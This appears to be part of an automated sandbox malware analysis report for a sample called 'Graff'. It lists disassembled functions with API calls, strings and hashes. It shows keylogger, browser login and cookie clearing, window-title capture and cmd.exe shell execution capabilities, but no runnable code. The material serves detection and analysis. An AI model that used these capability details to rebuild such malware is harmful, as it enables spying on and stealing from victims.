Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
Opcode Fuzzy Hash: e0074e42e7704986260eea99f70e76e500ed04f6c6fb6ad012614bce8c5eec24
Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99

Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
wsprintfW.USER32 ref: 0040A905

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84

Strings

], xrefs: 0040A892
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A88D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: cdceaa33380b2e7fcd3f386e220c8967f0059156a5bda01e29276b6f7c099e09
Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
Opcode Fuzzy Hash: cdceaa33380b2e7fcd3f386e220c8967f0059156a5bda01e29276b6f7c099e09
Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9

Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9

Strings

Online Keylogger Started, xrefs: 0040A626, 0040A62F, 0040A659

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 1df79a9e312060fa1b18aae75ab59605073d026c60d601c6b7722cb3e5801e75
Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
Opcode Fuzzy Hash: 1df79a9e312060fa1b18aae75ab59605073d026c60d601c6b7722cb3e5801e75
Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB

Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
__dosmaperr.LIBCMT ref: 0044AAFE

Strings

`@, xrefs: 0044AA78

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: `@
API String ID: 2583163307-951712118
Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F

Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7

Strings

Connection Timeout, xrefs: 00404B66

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A

Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08

Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C

Strings

bad locale name, xrefs: 0040CE16

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C

Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4

Strings

/C , xrefs: 004151D2
cmd.exe, xrefs: 004151E9
open, xrefs: 004151EE

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E

Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
GetProcAddress.KERNEL32(00000000), ref: 004014E6

Strings

GetLastInputInfo, xrefs: 004014D5
User32.dll, xrefs: 004014DA

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F

Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448D96
__alldvrm.LIBCMT ref: 00448F97
__alldvrm.LIBCMT ref: 00448FB9

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759

Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788

Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
__freea.LIBCMT ref: 100087D5

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0

Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040B81B
Sleep.KERNEL32(00001388), ref: 0040B8A3

Strings

[Cleared browsers logins and cookies.], xrefs: 0040B8DE
Cleared browsers logins and cookies., xrefs: 0040B8EF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: b4a0932546c662d439eb54e3763843a1a735f9e24cdb101a0487eced1e26abef
Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
Opcode Fuzzy Hash: b4a0932546c662d439eb54e3763843a1a735f9e24cdb101a0487eced1e26abef
Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF

Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D

Sleep.KERNEL32(00000BB8), ref: 004115C3

Strings

BG, xrefs: 00411539
exepath, xrefs: 0041154C, 0041158C, 0041160D
@CG, xrefs: 00411547

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: @CG$exepath$BG
API String ID: 4119054056-3221201242
Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD

Function 004185F1 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
EnumDisplayDevicesW.USER32(?), ref: 00418652
EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: DisplayEnum$Devices$Monitors
String ID:
API String ID: 1432082543-0
Opcode ID: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
Opcode Fuzzy Hash: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA

Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0041A9A0
Sleep.KERNEL32(000003E8), ref: 0041A9AB
GetSystemTimes.KERNEL32(?,?,?), ref: 0041A9C0
__aulldiv.LIBCMT ref: 0041AA5C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63

Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729

Sleep.KERNEL32(000001F4), ref: 00409C95
Sleep.KERNEL32(00000064), ref: 00409D1F

Strings

], xrefs: 00409C9D
[ , xrefs: 00409CB1

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF

Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C

Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068

Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043810F

Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6

_UnwindNestedFrames.LIBCMT ref: 00438124
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
CallCatchBlock.LIBVCRUNTIME ref: 0043815D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8

Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8

Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 00418519
GetSystemMetrics.USER32(0000004D), ref: 0041851F
GetSystemMetrics.USER32(0000004E), ref: 00418525
GetSystemMetrics.USER32(0000004F), ref: 0041852B

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9

Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00441F6D

Strings

pow, xrefs: 00441F45, 00441F62

Memory Dump Source

